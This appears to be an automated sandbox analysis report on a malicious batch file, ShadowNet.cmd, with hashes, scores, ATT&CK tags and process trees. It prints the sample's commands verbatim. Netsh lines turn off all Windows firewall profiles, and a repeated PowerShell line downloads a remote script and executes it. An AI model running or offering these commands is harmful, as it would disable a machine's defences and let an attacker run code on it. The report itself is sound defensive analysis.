7c84d31059e133b6dd6396cb66583d05c96fa755314afbcf1198b4408c02b1cc

Analysis

max time kernel
1049s
max time network
450s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 11:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ShadowNet.cmd
Size

1KB
MD5

0d684927cbb403c2e495ab2ae96ab750
SHA1

4c34100a17e2ef2a2eaa68d3eb9890d055209d71
SHA256

983deef20782152ffe2c116fed3a33b17b83bc88a82bff22e95a24154f0a1cfe
SHA512

866e011c1c4397ff50f20c9ff2024fdaf450759f925de53b8b9ed5a599413e968818abdbae43ce7d9bacc1c16b9f78c41aa7d277096f60ff3ddae791a89cb0cd

Score

10^/10

evasion execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://10.127.1.21:8080/script.ps1

Signatures

Modifies Windows Firewall 2 TTPs 7 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

1844 netsh.exe
2032 netsh.exe
1212 netsh.exe
1496 netsh.exe
2800 netsh.exe
3332 netsh.exe
3856 netsh.exe

pid	process
1844	netsh.exe
2032	netsh.exe
1212	netsh.exe
1496	netsh.exe
2800	netsh.exe
3332	netsh.exe
3856	netsh.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
768	powershell.exe
2004	powershell.exe
4200	powershell.exe
536	powershell.exe
1900	powershell.exe
2816	powershell.exe
220	powershell.exe
1424	powershell.exe
424	powershell.exe
5016	powershell.exe
4060	powershell.exe
1840	powershell.exe
3432	powershell.exe
1368	powershell.exe
3000	powershell.exe
1008	powershell.exe
1668	powershell.exe
1652	powershell.exe
3440	powershell.exe
4904	powershell.exe
2000	powershell.exe
2936	powershell.exe
3680	powershell.exe
1912	powershell.exe
3256	powershell.exe
3468	powershell.exe
3504	powershell.exe
4380	powershell.exe
1252	powershell.exe
2724	powershell.exe
1008	powershell.exe
2940	powershell.exe
2336	powershell.exe
3636	powershell.exe
3456	powershell.exe
1552	powershell.exe
1124	powershell.exe
2044	powershell.exe
1656	powershell.exe
4328	powershell.exe
5060	powershell.exe
3672	powershell.exe
2464	powershell.exe
2312	powershell.exe
4248	powershell.exe
2824	powershell.exe
1812	powershell.exe
3896	powershell.exe
2164	powershell.exe
1208	powershell.exe
4828	powershell.exe
2600	powershell.exe
1612	powershell.exe
4516	powershell.exe
4948	powershell.exe
4880	powershell.exe
1472	powershell.exe
1172	powershell.exe
2544	powershell.exe
4080	powershell.exe
1364	powershell.exe
116	powershell.exe
2032	powershell.exe
1052	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1152	timeout.exe
3480	timeout.exe
1156	timeout.exe
1424	timeout.exe
3960	timeout.exe
1944	timeout.exe
400	timeout.exe
1292	timeout.exe
2144	timeout.exe
4740	timeout.exe
5104	timeout.exe
924	timeout.exe
4564	timeout.exe
4688	timeout.exe
4012	timeout.exe
4940	timeout.exe
2000	timeout.exe
3588	timeout.exe
316	timeout.exe
3596	timeout.exe
1004	timeout.exe
4360	timeout.exe
1952	timeout.exe
4856	timeout.exe
4192	timeout.exe
3940	timeout.exe
3604	timeout.exe
1332	timeout.exe
744	timeout.exe
1180	timeout.exe
1332	timeout.exe
4728	timeout.exe
2272	timeout.exe
2344	timeout.exe
4920	timeout.exe
4988	timeout.exe
4832	timeout.exe
4836	timeout.exe
3896	timeout.exe
1472	timeout.exe
2008	timeout.exe
2448	timeout.exe
3476	timeout.exe
1696	timeout.exe
1408	timeout.exe
2172	timeout.exe
1892	timeout.exe
5060	timeout.exe
5080	timeout.exe
1180	timeout.exe
4572	timeout.exe
4452	timeout.exe
1840	timeout.exe
1988	timeout.exe
4260	timeout.exe
1660	timeout.exe
2544	timeout.exe
820	timeout.exe
540	timeout.exe
4224	timeout.exe
4356	timeout.exe
4456	timeout.exe
2844	timeout.exe
2984	timeout.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4528 ipconfig.exe

pid	process
4528	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
1548	powershell.exe
1548	powershell.exe
3504	powershell.exe
3504	powershell.exe
768	powershell.exe
768	powershell.exe
2816	powershell.exe
2816	powershell.exe
5060	powershell.exe
5060	powershell.exe
3636	powershell.exe
3636	powershell.exe
1812	powershell.exe
1812	powershell.exe
2544	powershell.exe
2544	powershell.exe
4516	powershell.exe
4516	powershell.exe
4496	powershell.exe
4496	powershell.exe
4380	powershell.exe
4380	powershell.exe
4428	powershell.exe
4428	powershell.exe
2004	powershell.exe
2004	powershell.exe
2312	powershell.exe
2312	powershell.exe
1328	powershell.exe
1328	powershell.exe
3892	powershell.exe
3892	powershell.exe
652	powershell.exe
652	powershell.exe
744	powershell.exe
744	powershell.exe
4260	powershell.exe
4260	powershell.exe
1912	powershell.exe
1912	powershell.exe
1788	powershell.exe
1788	powershell.exe
2148	powershell.exe
2148	powershell.exe
3128	powershell.exe
3128	powershell.exe
5080	powershell.exe
5080	powershell.exe
2632	powershell.exe
2632	powershell.exe
908	powershell.exe
908	powershell.exe
4948	powershell.exe
4948	powershell.exe
1252	powershell.exe
1252	powershell.exe
4828	powershell.exe
4828	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2080 wrote to memory of 1844	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 1844	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 2032	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 2032	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 1212	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 1212	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 1496	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 1496	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 2800	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 2800	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 3332	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 3332	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 3856	2080	cmd.exe	netsh.exe
PID 2080 wrote to memory of 3856	2080	cmd.exe	netsh.exe
PID 4384 wrote to memory of 4528	4384	cmd.exe	ipconfig.exe
PID 4384 wrote to memory of 4528	4384	cmd.exe	ipconfig.exe
PID 2080 wrote to memory of 2636	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2636	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1124	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1124	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1952	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1952	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3284	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3284	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1424	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1424	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 4948	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4948	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4492	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4492	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1548	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1548	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 4564	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4564	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2040	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2040	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3504	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 3504	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 4884	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4884	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3332	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3332	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 768	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 768	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 3644	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3644	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4464	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4464	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2816	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 2816	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1964	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1964	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2692	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 2692	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 5060	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 5060	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 1292	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 1292	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4448	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 4448	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 3636	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 3636	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 5080	2080	cmd.exe	timeout.exe
PID 2080 wrote to memory of 5080	2080	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ShadowNet.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
2⤵
- Modifies Windows Firewall
PID:1844

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
2⤵
- Modifies Windows Firewall
PID:2032

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
2⤵
- Modifies Windows Firewall
PID:1212

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
2⤵
- Modifies Windows Firewall
PID:1496

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
2⤵
- Modifies Windows Firewall
PID:2800

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
2⤵
- Modifies Windows Firewall
PID:3332

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3856

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4948

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4564

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4884

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1292

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:5080

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1464

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1424

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4676

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2600

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3596

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4728

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4740

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4088

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3508

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:5060

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1548

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:5068

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4356

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3960

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1660

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2104

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4836

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4336

C:\Windows\system32\timeout.exe
timeout /t 1
